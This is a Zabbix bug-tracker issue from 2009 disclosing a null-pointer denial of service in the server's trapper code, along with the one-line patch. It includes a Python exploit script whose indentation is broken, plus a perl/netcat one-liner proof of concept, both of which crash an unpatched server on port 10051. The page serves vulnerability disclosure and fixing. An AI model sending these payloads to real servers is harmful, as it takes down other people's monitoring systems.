[ZBX-993] DoS in Zabbix Server Created: 2009 Jul 21  Updated: 2017 May 30  Resolved: 2009 Jul 21

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: Proxy (P), Server (S)
Affects Version/s: 1.6
Fix Version/s: 1.6

Type: Incident report Priority: Critical
Reporter: Alexander Vladishev Assignee: Alexander Vladishev
Resolution: Fixed Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

Zabbix server v1.6.x


 Description   

While reading Zabbix source code, I found a small error leading to an
easy to exploit denial of service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).

In src/zabbix_server/trapper/trapper.c, function process_trap() :

  1. Make a truncated to 2047 copy of "s"
    strscpy(copy,s);
  1. Check if there's some ":" in "s" (and not in "copy" !)
    server=(char *)strtok(s,":");

[...]

  1. Look for the 1st ":" in "copy"
    value_string=strchr(copy,':');
  1. If 1st ":" in "s" if after offset 2047
  2. we got a null ptr deference crash
    value_string=strchr(value_string+1,':');

The patch is trivial : just use "copy" instead of "s" in your check.

server=(char *)strtok(copy,":");

Exploit code :

8<-----------------------------------------------------------------
#!/usr/bin/python

PORT = 10051
HOST = "192.168.2.89"

import socket
import struct

try:
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.settimeout(3)
socket.connect((HOST, PORT))

header = 'ZBXD\x01'

  1. DoS in ./src/zabbix_server/trapper/trapper.c
  2. If first ":" is after 2047 => DoS when reading NULL+1
    data = 'A'*2050 + ':B'

size = struct.pack('q', len(data))
socket.send(header + size + data)
rcvdata = socket.recv(10240)
print rcvdata
except:
print "FAIL"

socket.close()
8<-----------------------------------------------------------------

 Comments   
Comment by Alexander Vladishev [ 2009 Jul 21 ]

Fixed in version pre1.6.6, rev. 7690.

Comment by richlv [ 2009 Sep 15 ]

closing all resolved issues

Comment by Rafael Gomes [ 2009 Dec 15 ]

I got this error with exploit:

File "166.pl", line 18
data = 'A'*2050 + ':B'
^
SyntaxError: invalid syntax

My Zabbix server 1.6.4 was compiled from source.

My version is affected too?

Comment by richlv [ 2009 Dec 15 ]

ad the original comment said, it should be fixed in 1.6.6

ZBX-993#action_16403

Comment by richlv [ 2009 Dec 15 ]

let's try full link then...
https://support.zabbix.com/browse/ZBX-993#action_16403

Comment by Rafael Gomes [ 2009 Dec 15 ]

I just wanna know if my version is affected, because I can't exploit with this code.

Comment by Nicob [ 2009 Dec 15 ]

Indentation of the provided exploit code is broken.

Version 1.6.4 (even from source) is affected, but you may try the following PoC :
perl -e 'print "ZBXD\x01" . "A"x2050 . ":B";' | nc -v 127.0.0.1 10051

Comment by Rafael Gomes [ 2009 Dec 16 ]

Hi Nicob,

Thanks for you help, but I can't exploit it yet.

When I put your code in server, I didn't get anything and my server still running

Generated at Thu Apr 25 09:53:50 EEST 2024 using Jira 9.12.4#9120004-sha1:625303b708afdb767e17cb2838290c41888e9ff0.